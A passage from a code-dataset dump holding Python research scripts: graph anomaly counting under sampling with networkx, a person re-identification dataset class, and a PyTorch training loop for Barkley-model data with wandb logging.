nodes\n f = open(path1, \"r\")\n reader1 = csv.reader(f)\n nodes = []\n type1 = []\n for item in reader1:\n nodes.append(int(item[0]))\n type1.append(int(item[1]))\n f.close()\n if isDirect:\n G = nx.DiGraph()\n else:\n G = nx.Graph()\n G.add_nodes_from(nodes)\n\n # add node attribution\n k = 0\n for n, data in G.nodes(data=True):\n G.node[n]['global'] = 0\n G.node[n]['star'] = 0\n G.node[n]['isolates'] = 0\n G.node[n]['arti'] = 0\n G.node[n]['type1'] = type1[k]\n k += 1\n\n # add edges\n f = open(path2, \"r\")\n reader1 = csv.reader(f)\n edges = []\n type2 = []\n for item in reader1:\n edges.append([int(item[0]), int(item[1])])\n type2.append(int(item[2]))\n f.close()\n G.add_edges_from(edges)\n\n # add edge attribution\n i = 0\n for u, v, d in G.edges(data=True):\n G[u][v]['bridge'] = 0\n G[u][v]['type'] = type2[i]\n i += 1\n\n return(G)\n\ndef find_Bridge(G, s=0):\n bridges = nx.bridges(G)\n old_edge = 0\n bridges = list(bridges)\n\n count = 0\n for i in bridges:\n count += 1\n if G[i[0]][i[1]]['bridge'] == 0:\n G[i[0]][i[1]]['bridge'] = 1\n else:\n old_edge += 1\n G[i[0]][i[1]]['bridge'] = 2\n\n if s == 1:\n for (u, v, d) in G.edges(data='bridge'):\n if d == 1 and (u, v) not in bridges:\n G[u][v]['bridge'] = 0\n\n\n print(\"bridge(edge) : %d\" % count)\n if s == 1:\n print(\"bridge new (edge) : %d\" % (count - old_edge))\n return(count, old_edge)\n else:\n 
return(count)\n\n\ndef Save_Graph(G, sample_type, filename, iter):\n path = 'res_Data_test2/{}_{}{}_orig.gml'.format(sample_type, filename, iter)\n nx.write_gml(G, path)\n\n\ndef test_Sampling(G, orig_anomalous_edge, orig_anomalous_node):\n G1 = nx.Graph()\n for n, data in G.nodes(data=True):\n if data['type1'] == 2:\n G1.add_node(n)\n for i, j in data.items():\n G1.node[n][i] = j\n\n for (u, v, d) in G.edges(data=True):\n if d['type'] == 2:\n G1.add_edge(u, v)\n for i, j in d.items():\n G1[u][v][i] = j\n degree_total = 0\n for x in G1.nodes():\n degree_total = degree_total + G1.degree(x)\n\n threshold = degree_total / len(G1)\n\n print('nodes number : %d' % G1.number_of_nodes())\n print('edges number : %d' % G1.number_of_edges())\n print(\"average degree: %s\" % threshold)\n print(\"average clustering: %s\" % nx.average_clustering(G1))\n print(\"density: %s\" % nx.density(G1))\n print('---------------------')\n\n sample_anomalous_node = {}\n sample_anomalous_node_old = {}\n\n sample_anomalous_edge = {}\n sample_anomalous_edge_old = {}\n\n\n tmp, t = find_Bridge(G1, s=1)\n sample_anomalous_edge['bridge'] = tmp\n sample_anomalous_edge_old['bridge'] = t\n\n heigh_neighbour = 0.05\n tmp, t = Extract_Global_High_Neighbor(G1, heigh_neighbour, s=1)\n sample_anomalous_node['hub'] = tmp\n sample_anomalous_node_old['hub'] = t\n\n\n tmp, t = Extract_Star(G1, threshold, s=1)\n sample_anomalous_node['star'] = tmp\n sample_anomalous_node_old['star'] = t\n\n\n tmp, t = Articulation_Points(G1, s=1)\n sample_anomalous_node['arti'] = tmp\n sample_anomalous_node_old['arti'] = t\n\n tmp, t = Isolates(G1, s=1)\n sample_anomalous_node['iso'] = tmp\n sample_anomalous_node_old['iso'] = t\n\n sum_node = 0\n for i in sample_anomalous_node:\n sum_node = sum_node + sample_anomalous_node[i]\n\n sum_node_new = 0\n for i in sample_anomalous_node_old:\n sum_node_new = sum_node_new + sample_anomalous_node_old[i]\n\n sum_edge = 0\n for i in sample_anomalous_edge:\n sum_edge = sum_edge + sample_anomalous_edge[i]\n\n sum_edge_old = 0\n for i in sample_anomalous_edge_old:\n sum_edge_old = sum_edge_old + sample_anomalous_edge_old[i]\n\n sum_node_orig = 0\n for i in orig_anomalous_node:\n sum_node_orig = sum_node_orig + orig_anomalous_node[i]\n\n sum_edge_orig = 0\n for i in orig_anomalous_edge:\n sum_edge_orig = sum_edge_orig + orig_anomalous_edge[i]\n\n keys = list(orig_anomalous_node.keys())\n ori = list(orig_anomalous_node.values())\n s_all = list(sample_anomalous_node.values())\n s_new = list(sample_anomalous_node_old.values())\n\n per = {}\n for i in range(len(ori)):\n if ori[i] != 0:\n per[keys[i]] = (s_all[i] - s_new[i]) / ori[i]\n else:\n per[keys[i]] = -1\n keys_edge = list(orig_anomalous_edge.keys())\n ori_e = list(orig_anomalous_edge.values())\n s_old_e = list(sample_anomalous_edge_old.values())\n\n per_e = {}\n for i in range(len(ori_e)):\n if ori_e[i] != 0:\n per_e[keys_edge[i]] = s_old_e[i] / ori_e[i]\n else:\n per_e[keys_edge[i]] = -1\n\n\n per_new = {}\n per_new_old = {}\n new_keys = list(sample_anomalous_node_old.keys())\n for i in range(len(s_new)):\n per_new[new_keys[i]] = s_new[i] / len(G)\n if (s_all[i] - s_new[i]) != 0:\n per_new_old[new_keys[i]] = s_new[i] / (s_all[i] - s_new[i])\n else:\n per_new_old[new_keys[i]] = -1\n\n\n per_new_e = {}\n per_new_old_e = {}\n for i in range(len(ori_e)):\n per_new_e[keys_edge[i]] = (ori_e[i] - s_old_e[i]) / len(list(G.edges()))\n if s_old_e[i] != 0:\n per_new_old_e[keys_edge[i]] = (ori_e[i] - s_old_e[i]) / s_old_e[i]\n else:\n per_new_old_e[keys_edge[i]] = -1\n\n 
print('--------keep--------')\n for u, v in per.items():\n if v != -1:\n a = '(sensitive) the {} is hold: {:.2%}'.format(u, v)\n print(a)\n else:\n a = '(sensitive) the {} is hold: {}'.format(u, '-')\n print(a)\n print('-----------------')\n for u, v in per_e.items():\n if v != -1:\n b = '(sensitive) the {} is hold: {:.2%}'.format(u, v)\n print(b)\n else:\n b = '(sensitive) the {} is hold: {}'.format(u, '-')\n print(b)\n\n print('--------new--------')\n for u, v in per_new.items():\n if v != -1:\n a = 'the new {} is born: {:.2%}'.format(u, v)\n print(a)\n else:\n a = 'the new {} is born: {}'.format(u, '-')\n print(a)\n print('--------------------')\n for u, v in per_new_old.items():\n if v != -1:\n a = 'the {} new / old rate is : {:.2%}'.format(u, v)\n print(a)\n else:\n a = 'the {} new / old rate is :{}'.format(u, '-')\n print(a)\n print('-----------------')\n for u, v in per_new_e.items():\n if v != -1:\n b = 'the new {} is born: {:.2%}'.format(u, v)\n print(b)\n else:\n b = 'the new {} is born: {}'.format(u, '-')\n print(b)\n print('--------------------')\n for u, v in per_new_old_e.items():\n if v != -1:\n b = 'the {} new / old rate is: {:.2%}'.format(u, v)\n print(b)\n else:\n b = 'the {} new / old rate is: {}'.format(u, '-')\n print(b)\n\n\n # print('--------anomalous--------')\n # print('orig:------------')\n # print(\"anomalous node sum : %d\" % sum_node_orig)\n # print(\"anomalous node rate: %f\" % (sum_node_orig / len(list(G.nodes()))))\n # print('-----------------')\n # print(\"anomalous edge sum : %d\" % sum_edge_orig)\n # print(\"anomalous edge rate: %f\" % (sum_edge_orig / len(list(G.edges()))))\n #\n # print('sample:----------')\n # print(\"sample anomalous node sum (orig) : %d\" % (sum_node - sum_node_new))\n # print(\"sample anomalous node rate (orig): %f\" % ((sum_node - sum_node_new) / len(list(G1.nodes()))))\n # print(\"sample anomalous node sum (new) : %d\" % sum_node_new)\n # print(\"sample anomalous node rate (new): %f\" % (sum_node_new / len(list(G1.nodes()))))\n # print(\"sample anomalous node sum (total) : %d\" % sum_node)\n # print(\"sample anomalous node rate (total): %f\" % (sum_node / len(list(G1.nodes()))))\n # print(\"-----------------\")\n # print(\"sample anomalous edge sum (orig) : %d\" % sum_edge_old)\n # print(\"sample anomalous edge rate (orig): %f\" % (sum_edge_old / len(list(G1.edges()))))\n # print(\"sample anomalous edge sum (new) : %d\" % (sum_edge - sum_edge_old))\n # print(\"sample anomalous edge rate (new): %f\" % ((sum_edge - sum_edge_old) / len(list(G1.edges()))))\n # print(\"sample anomalous edge sum (total) : %d\" % sum_edge)\n # print(\"sample anomalous edge rate (total): %f\" % (sum_edge / len(list(G1.edges()))))\n\n\n add_Anomalous_types(G1, s=1, _G=G)\n\n # print('-----')\n # for n, data in G1.nodes(data='global'):\n # print(n, data)\n\n # for (u, v, d) in G1.edges(data=True):\n # print(u, v, d)\n\n # save graph\n path = 'res_Data/test.gml'\n nx.write_gml(G1, path)\n\n\ndef Articulation_Points(G, s=0):\n l = list(nx.articulation_points(G))\n new_node = 0\n for node in l:\n if G.node[node]['arti'] == 0:\n G.node[node]['arti'] = 1\n new_node += 1\n else:\n G.node[node]['arti'] = 2\n\n print(\"articulation (nodes) : %d\" % len(l))\n\n if s == 1:\n for n, data in G.nodes(data='arti'):\n if data == 1 and n not in l:\n G.node[n]['arti'] = 0\n\n if s == 1:\n print(\"articulation new (nodes) : %d\" % new_node)\n return(len(l), new_node)\n else:\n return(len(l))\n\n\ndef Isolates(G, s=0):\n l = list(nx.isolates(G))\n new_node = 0\n for node in 
l:\n if G.node[node]['isolates'] == 0:\n G.node[node]['isolates'] = 1\n new_node += 1\n else:\n G.node[node]['isolates'] = 2\n\n if s == 1:\n for n, data in G.nodes(data='isolates'):\n if data == 1 and n not in l:\n G.node[n]['isolates'] = 0\n\n print(\"isolates: %d\" % len(l))\n if s == 1:\n print(\"isolates new : %d\" % new_node)\n return(len(l), new_node)\n else:\n return(len(l))\n\ndef add_Anomalous_types(G, s=0, _G=None):\n\n # nodes\n for n, data in G.nodes(data=True):\n a = list(data.values())\n count = 0\n if s == 0:\n for i in range(len(a) - 1):\n if a[i] != 0:\n count += 1\n if count > 0:\n G.node[n]['anomalous'] = 1\n else:\n G.node[n]['anomalous'] = 0\n else:\n for i in range(len(a) - 2):\n if a[i] != 0:\n count += 1\n if count > 0:\n if G.node[n]['anomalous'] == 0:\n G.node[n]['anomalous2'] = 2 # new anomalous\n _G.node[n]['anomalous2'] = 2 # new anomalous\n else:\n G.node[n]['anomalous2'] = 1\n _G.node[n]['anomalous2'] = 1\n else:\n if G.node[n]['anomalous'] == 1:\n G.node[n]['anomalous2'] = 3 # new disappear\n _G.node[n]['anomalous2'] = 3 # new disappear\n else:\n G.node[n]['anomalous2'] = 0\n _G.node[n]['anomalous2'] = 0\n\n # edges\n for (u, v, d) in G.edges(data=True):\n b = list(d.values())\n count = 0\n if s == 1:\n for i in range(len(b) - 2):\n if b[i] != 0:\n count += 1\n if count > 0:\n if G[u][v]['anomalous'] == 0:\n G[u][v]['anomalous2'] = 2 # new anomalous\n _G[u][v]['anomalous2'] = 2 # new anomalous\n else:\n G[u][v]['anomalous2'] = 1\n _G[u][v]['anomalous2'] = 1\n else:\n if G[u][v]['anomalous'] == 1:\n G[u][v]['anomalous2'] = 3 # new disappear\n _G[u][v]['anomalous2'] = 3 # new disappear\n else:\n G[u][v]['anomalous2'] = 0\n _G[u][v]['anomalous2'] = 0\n else:\n for i in range(len(b) - 1):\n if b[i] != 0:\n count += 1\n if count > 0:\n G[u][v]['anomalous'] = 1\n else:\n G[u][v]['anomalous'] = 0\n\n\ndef get_Info(G):\n degree_total = 0\n for x in G.nodes():\n degree_total = degree_total + G.degree(x)\n threshold = degree_total / len(G)\n\n # print('---------original---------')\n # print('nodes number : %d' % G.number_of_nodes())\n # print('edges number : %d' % G.number_of_edges())\n # print(\"average degree: %s\" % threshold)\n # print(\"average clustering: %s\" % nx.average_clustering(G))\n # print(\"density: %s\" % nx.density(G))\n\n\ndef Data_Test(sample_type, filename, iter, rate):\n\n # Test file type\n path1 = \"../KeepAnomalous/ExperimentData_test3/{}_{}{}_node.csv\".format(sample_type, filename, iter)\n path2 = \"../KeepAnomalous/ExperimentData_test3/{}_{}{}_edge.csv\".format(sample_type, filename, iter)\n isDirect = False\n print('hi')\n\n G = loadData(path1, path2, isDirect)\n # get_Info(G)\n\n degree_total = 0\n for x in G.nodes():\n degree_total = degree_total + G.degree(x)\n threshold = degree_total / len(G)\n\n print('---------original---------')\n print('sampling rate : {:.2%} '.format(rate))\n print('--------------------------')\n print('nodes number : %d' % G.number_of_nodes())\n print('edges number : %d' % G.number_of_edges())\n print(\"average degree: %s\" % threshold)\n print(\"average clustering: %s\" % nx.average_clustering(G))\n print(\"density: %s\" % nx.density(G))\n print('---------------------')\n\n orig_anomalous_node = {}\n orig_anomalous_edge = {}\n\n tmp = find_Bridge(G)\n orig_anomalous_edge['bridge'] = tmp\n\n heigh_neighbour = 0.05\n tmp = Extract_Global_High_Neighbor(G, heigh_neighbour)\n orig_anomalous_node['hub'] = tmp\n\n\n\n tmp = Extract_Star(G, threshold)\n orig_anomalous_node['star'] = tmp\n\n tmp = 
Articulation_Points(G)\n    orig_anomalous_node['arti'] = tmp\n\n    tmp = Isolates(G)\n    orig_anomalous_node['iso'] = tmp\n\n\n    sum_node = 0\n    for i in orig_anomalous_node:\n        sum_node = sum_node + orig_anomalous_node[i]\n\n    sum_edge = 0\n    for i in orig_anomalous_edge:\n        sum_edge = sum_edge + orig_anomalous_edge[i]\n\n    print(\"anomalous node sum : %d\" % sum_node)\n    print(\"anomalous edge sum : %d\" % sum_edge)\n    print(\"anomalous node rate: %f\" % (sum_node / len(list(G.nodes()))))\n    print(\"anomalous edge rate: %f\" % (sum_edge / len(list(G.edges()))))\n\n    add_Anomalous_types(G)\n\n\n    print('---------sampling---------')\n    test_Sampling(G, orig_anomalous_edge, orig_anomalous_node)\n\n    Save_Graph(G, sample_type, filename, iter)\n\n\nif __name__ == '__main__':\n    sample_type = 'NTIES'\n    filename = 'pgp2_0.50'\n    iter = 1\n    rate = 0.15\n    for i in range(iter):\n        Data_Test(sample_type, filename, i+1, rate)", "sub_path": "KeepAnomalous/keep_anomalous.py", "file_name": "keep_anomalous.py", "file_ext": "py", "file_size_in_byte": 17479, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 99, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 107, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 109, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 124, "usage_type": "call"}, {"api_name": "networkx.bridges", "line_number": 143, "usage_type": "call"}, {"api_name": "networkx.write_gml", "line_number": 172, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 176, "usage_type": "call"}, {"api_name": "networkx.average_clustering", "line_number": 197, "usage_type": "call"}, {"api_name": "networkx.density", "line_number": 198, "usage_type": "call"}, {"api_name": "networkx.write_gml", "line_number": 384, "usage_type": "call"}, {"api_name": "networkx.articulation_points", "line_number": 388, "usage_type": "call"}, {"api_name": "networkx.isolates", "line_number": 412, "usage_type": "call"}, {"api_name": "networkx.average_clustering", "line_number": 534, "usage_type": "call"}, {"api_name": "networkx.density", "line_number": 535, "usage_type": "call"}]} +{"seq_id": "518574928", "text": "import os\nimport random\n\nfrom datasets.Market1501Dataset import Market1501Dataset\n\nPRW_MEAN = [107.78022505, 102.29057153, 100.65454852]\nPRW_STD = [48.71011114, 47.32708588, 46.7601729]\nPRW_NUM_TRAINING_CLASSES = 485\n\n\nclass PRWDataset(Market1501Dataset):\n\tdef __init__(self, data_directory, dataset_part, mean=None, std=None, num_classes=None, augment=True, png=False):\n\t\tif mean is None:\n\t\t\tmean = PRW_MEAN\n\t\tif std is None:\n\t\t\tstd = PRW_STD\n\t\tif num_classes is None:\n\t\t\tnum_classes = PRW_NUM_TRAINING_CLASSES\n\n\t\tsuper().__init__(mean=mean, std=std, num_classes=num_classes, data_directory=data_directory, dataset_part=dataset_part, augment=augment, png=png)\n\n\tdef get_input_data(self, is_training):\n\t\tif self._dataset_part == 'test':\n\t\t\timage_paths = self.get_images_from_folder()\n\n\t\t\tif is_training:\n\t\t\t\trandom.shuffle(image_paths)\n\n\t\t\tfile_names = [os.path.basename(file) for file in image_paths]\n\n\t\t\tactual_labels = [0] * len(image_paths)\n\t\t\tlabels = [0] * len(image_paths)\n\t\t\tcameras = [0] * len(image_paths)\n\n\t\t\tprint('Read %d image paths for processing for dataset_part: %s' % (len(image_paths), self._dataset_part))\n\t\t\treturn image_paths, file_names, actual_labels, labels, 
cameras\n\n\t\telse:\n\t\t\treturn super().get_input_data(is_training)\n", "sub_path": "datasets/PRWDataset.py", "file_name": "PRWDataset.py", "file_ext": "py", "file_size_in_byte": 1247, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "datasets.Market1501Dataset.Market1501Dataset", "line_number": 11, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "27069088", "text": "# -*- coding: utf-8 -*-\n# %%\n# execute with qsub main.py -epochs 16 -batch_size 2 -config config/training_two_spirals.yaml -time_steps 1 2 4 8 16 20 25 28 30 32 -depth 32\n# this loops multiple trainings with different time-steps. See in the config file for further specifications\n# ! python\n\n# name\n#$ -N training\n\n# execute from current directory\n#$ -cwd\n\n# Preserve environment variables\n#$ -V\n\n# Provide path to python executable, has to provide the packages from requirements.txt\n#$ -S /home/stenger/smaxxhome/anaconda3/envs/gpu/bin/python\n\n# Merge error and out\n#$ -j yes\n\n# serial queue\n#$ -q taranis-gpu1.q\n\n# Path for output\n#$ -o /home/stenger/smaxxhome/outputs\n\n# %%\nimport os, sys\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import random_split\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\nfrom tqdm import tqdm\nimport yaml\nimport pprint\nimport re\n\nimport wandb\n\nworking_path = os.path.join(os.path.dirname(os.getcwd()), '')\nsys.path.append(working_path)\n\nfrom src.modules import STLSTM, Conv2D\nfrom src.datasets import BarkleyDataset\n\nimport argparse\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint('Found', torch.cuda.device_count(), 'GPUs')\n\nwandb.login()\n\nos.environ[\"WANDB_MODE\"] = \"dryrun\"\n\ntorch.manual_seed(42)\n\n\n# %%\ndef make(config): \n #model = nn.DataParallel(STLSTM(1,config['hidden_size'])).to(device)\n model = nn.DataParallel(Conv2D()).to(device)\n \n print(config['depths'])\n \n if config['dataset']=='regimeA':\n root = config['data_folder_regimeA']\n elif config['dataset']=='regimeB':\n root = config['data_folder_regimeB']\n \n #train_dataset = BarkleyDataset(root=root,\n # train=True, \n # depths=config['depths'],\n # time_steps=config['time_steps'])\n \n #n_train = int(len(train_dataset)*0.90+0.5)\n #n_val = int(len(train_dataset)*0.10+0.5)\n \n #torch.manual_seed(42)\n #train_dataset, test_dataset = random_split(train_dataset, [n_train, n_val]) \n #test_dataset.train = False\n\n #train_loader = DataLoader(train_dataset, config['batch_size'], shuffle=True, num_workers=0, pin_memory=True, drop_last=True)\n #test_loader = DataLoader(test_dataset, 2, shuffle=True, num_workers=0, pin_memory=True, drop_last=True)\n \n criterion = nn.MSELoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=config['lr'])\n\n \n return model, criterion, optimizer\n\n# %%\ndef getDataLoader(dataset_idx, config):\n print(f'Load dataset number {dataset_idx}')\n if config['dataset']=='regimeA':\n root = config['data_folder_regimeA']\n elif config['dataset']=='regimeB':\n root = config['data_folder_regimeB']\n \n #print('Hier', config['depths'], type(config['depths']), type(config['depths'][0]))\n train_dataset = BarkleyDataset(root=root,\n 
train=True, \n depths=config['depths'],\n time_steps=config['time_steps'])\n \n n_train = int(len(train_dataset)*0.90+0.5)\n n_val = int(len(train_dataset)*0.10+0.5)\n \n torch.manual_seed(42)\n train_dataset, val_dataset = random_split(train_dataset, [n_train, n_val]) \n val_dataset.train = False\n\n train_loader = DataLoader(train_dataset, config['batch_size'], shuffle=True, num_workers=0, pin_memory=True, drop_last=True)\n val_loader = DataLoader(val_dataset, 2, shuffle=True, num_workers=0, pin_memory=True, drop_last=True)\n \n return train_loader, val_loader\n\n\n# %%\ndef train(model, criterion, optimizer, config, val_fn=nn.MSELoss()):\n #torch.save(model.state_dict(), 'model')\n def get_lr():\n for param_group in optimizer.param_groups:\n return param_group['lr']\n \n lrp = ReduceLROnPlateau(optimizer, patience=512, factor=0.3, min_lr=1e-7, verbose=True)\n \n #test_dataloader_iter = iter(test_dataloader)\n \n if config['dataset']=='regimeA':\n config['save_dir'] = config['save_folder_models_regimeA']\n elif config['dataset']=='regimeB':\n config['save_dir'] = config['save_folder_models_regimeB']\n \n \n min_val_loss = 10000 \n val_losses = []\n \n depths = config['depths']\n \n print(config['save_name'] )\n\n for epoch in range(config['epochs']): \n print(f'Epoch number {epoch}')\n for dataset_idx in range(config['num_datasets']):\n train_loader, test_loader = getDataLoader(dataset_idx=dataset_idx, config=config)\n test_loader_iter = iter(test_loader)\n \n for i, (X,y) in tqdm(enumerate(train_loader), total=len(train_loader)):\n model.zero_grad()\n optimizer.zero_grad()\n\n X = X.to(device)\n y = y.to(device)\n\n outputs = model(X, max_depth=len(depths))\n\n loss = 0.0\n loss += criterion(y, outputs) # [depths,batch,features=1,:,:]\n\n outputs = outputs.detach()\n\n loss.backward()\n optimizer.step() \n\n if i%10==0:\n try:\n X_val, y_val = next(test_loader_iter)\n except StopIteration:\n test_loader_iter = iter(test_loader)\n X_val, y_val = next(test_loader_iter)\n X_val = X_val.to(device)\n y_val = y_val.to(device)\n\n with torch.no_grad():\n val_outputs = model(X_val, max_depth=len(depths))\n val_loss = val_fn(y_val, val_outputs)\n val_losses.append(val_loss.cpu().detach().numpy())\n lrp.step(val_loss)\n\n wandb.log({\"loss\": loss, \"val_loss\":val_loss})\n if val_loss < min_val_loss:\n min_val_loss = val_loss\n\n name = config['save_name'] + '_t' + str(config['time_steps_savename']) + '_d' + config['depths_savename']\n\n try:\n os.makedirs(config['save_dir'])\n except FileExistsError:\n pass\n\n savename = os.path.join(config['save_dir'], name)\n print('Save model under:', savename)\n torch.save(model.state_dict(), savename) \n\n# %%\ndef pipeline(config): \n if config['dataset']=='regimeA':\n data_folder = config['data_folder_regimeA']\n log_folder = config['log_folder_regimeA']\n save_folder_models = config['save_folder_models_regimeA']\n elif config['dataset']=='regimeB':\n data_folder = config['data_folder_regimeB']\n log_folder = config['log_folder_regimeB']\n save_folder_models = config['save_folder_models_regimeB']\n \n #if config['wandb']:\n \n name = config['save_name'] + '_t' + str(config['time_steps_savename']) + '_d' + config['depths_savename']\n \n wandb.init(project=config['project_name'], \n name=name, dir=log_folder, \n config=config, \n reinit=True)\n \n #config = wandb.config\n \n model, criterion, optimizer = make(config)\n #if config['wandb']:\n wandb.watch(model, criterion, log=\"all\", log_freq=32)\n \n train(model, criterion, optimizer, config, 
val_fn=nn.L1Loss())\n\n    #run.finish()\n    return model\n\n# %%\nif __name__=='__main__':\n    parser = argparse.ArgumentParser(description='Training of Neural Networks, the Barkley Diver')\n\n    ### Names ###\n    parser.add_argument('-project_name', '--project_name', type=str)\n    parser.add_argument('-name', '--name', type=str, help='')\n    \n    ### Save and load dataset/weights etc. ###\n    parser.add_argument('-dataset', '--dataset', type=str)\n    parser.add_argument('-save_name', '--save_name', type=str)\n    \n    ### Model ###\n    parser.add_argument('-architecture', '--architecture', type=str)\n    parser.add_argument('-hidden_size', '--hidden_size', type=int)\n    \n    ### Training process ###\n    parser.add_argument('-lr', '--lr', type=int)\n    parser.add_argument('-batch_size', '--batch_size', type=int)\n    \n    ### Experiment specific quantities ###\n    parser.add_argument('-epochs', '--epochs', type=int)\n    parser.add_argument('-time_steps', '--time_steps', type=list, nargs='+', \n                        help='Time steps given as input, for example like: 0-31,2; or as a list: 0 1 2 3,')\n    parser.add_argument('-depths', '--depths', type=list, nargs='+', \n                        help='Depths given as target for prediction, for example like: 0-31,2; or as a list: 0 1 2 3,')\n    \n    # Config files\n    parser.add_argument('-config', '--config', type=str, help='Place of config file')\n    parser.add_argument('-metadata', '--metadata', type=str, help='Main folder structure')\n    parser.add_argument('-offline', '--offline', type=str, help='Use wandb-logger online?')\n    parser.add_argument('-num_datasets', '--num_datasets', type=int, help='How many dataset-files should be used?...increases the training-size')\n\n    _args = parser.parse_args()\n    args = vars(_args)\n    args_parser = {k: v for k, v in args.items() if v is not None}\n    #args_parser = vars(parser.parse_args())\n    #print(args_parser)\n\n    metadata = args['metadata']\n    \n    if not isinstance(args['config'], type(None)):\n        try:\n            with open(args['config']) as config_file:\n                config_args = yaml.load(config_file, Loader=yaml.FullLoader)\n            args.update(config_args)\n        except FileNotFoundError:\n            print('Config-file not found, use default values')\n            assert('Config-file not found, use default values') \n    \n    if metadata is not None:\n        args['metadata'] = metadata\n    \n    if not isinstance(args['metadata'], type(None)):\n        #print(args['metadata'])\n        try:\n            with open(args['metadata']) as config_file:\n                metadata_args = yaml.load(config_file, Loader=yaml.FullLoader)\n            args.update(metadata_args)\n        except FileNotFoundError:\n            print('Metadata-file not found, use default values')\n            assert('Metadata-file not found, use default values') \n\n    \n    #pipeline(args)\n    #print(args, '\\n', args_parser)\n    \n    args.update(args_parser)\n    \n    if len(args['depths'])>1:\n        depths = [int(''.join(depth)) for depth in args['depths']]\n\n    elif len(args['depths'])==1:\n        s = args['depths'][0]\n        s = ''.join(s)\n        ints = [int(r) for r in re.split(',|-', s)]\n        #print('length of ints', ints)\n        if len(ints)==1:\n            depths = ints\n            #print(ints)\n        else:\n            depths = np.arange(*ints)\n    \n    args['depths_savename'] = s\n    args['depths'] = depths\n    \n    \n    \n    if len(args['time_steps'])>1:\n        time_steps = [int(''.join(time_step)) for time_step in args['time_steps']]\n\n    elif len(args['time_steps'])==1:\n        s = args['time_steps'][0]\n        \n        s = ''.join(s)\n        ints = [int(r) for r in re.split(',|-', s)]\n        if len(ints)==1:\n            time_steps = ints\n            #print(ints)\n        else:\n            time_steps = np.arange(*ints)\n    \n    args['time_steps_savename'] = s\n    args['time_steps'] = time_steps\n    \n    pprint.pprint(args)\n\n    m = pipeline(args)\n    \n    
\n \"\"\"\n args_config.update(specified_config)\n\n if int(args.offline)==True:\n print('No internet')\n os.environ['WANDB_MODE'] = 'dryrun'\n WANDB_MODE=\"dryrun\"\n\n if not isinstance(args.depths, type(None)):\n print(args.depths)\n depths = args.depths\n print(depths)\n ds = [int(''.join(depth)) for depth in depths]\n\n args_config['depths'] = ds\n if not isinstance(args.time_steps, type(None)):\n for t in args.time_steps:\n t_int = int(''.join(t))\n args_config['time_step'] = t_int\n\n for key, value in args_config.items():\n print(key + ':', value)\n\n m = pipeline(args_config)\n else:\n for key, value in args_config.items():\n print(key + ':', value)\n\n m = pipeline(args_config)\n \n elif not isinstance(args.time_steps, type(None)):\n for t in args.time_steps:\n t_int = int(''.join(t))\n args_config['time_step'] = t_int\n for key, value in args_config.items():\n print(key + ':', value)\n m = pipeline(args_config)\n else:\n for key, value in args_config.items():\n print(key + ':', value)\n m = pipeline(args_config)\n \n \"\"\"\n", "sub_path": "scripts/training.py", "file_name": "training.py", "file_ext": "py", "file_size_in_byte": 12865, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 48, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 48, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 56, "usage_type": "attribute"}, {"api_name": "torch.cuda.device_count", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 57, "usage_type": "attribute"}, {"api_name": "wandb.login", "line_number": 59, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 61, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn.DataParallel", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "src.modules.Conv2D", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 94, "usage_type": "attribute"}, {"api_name": "src.datasets.BarkleyDataset", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.utils.data.random_split", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.ReduceLROnPlateau", "line_number": 133, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 156, 
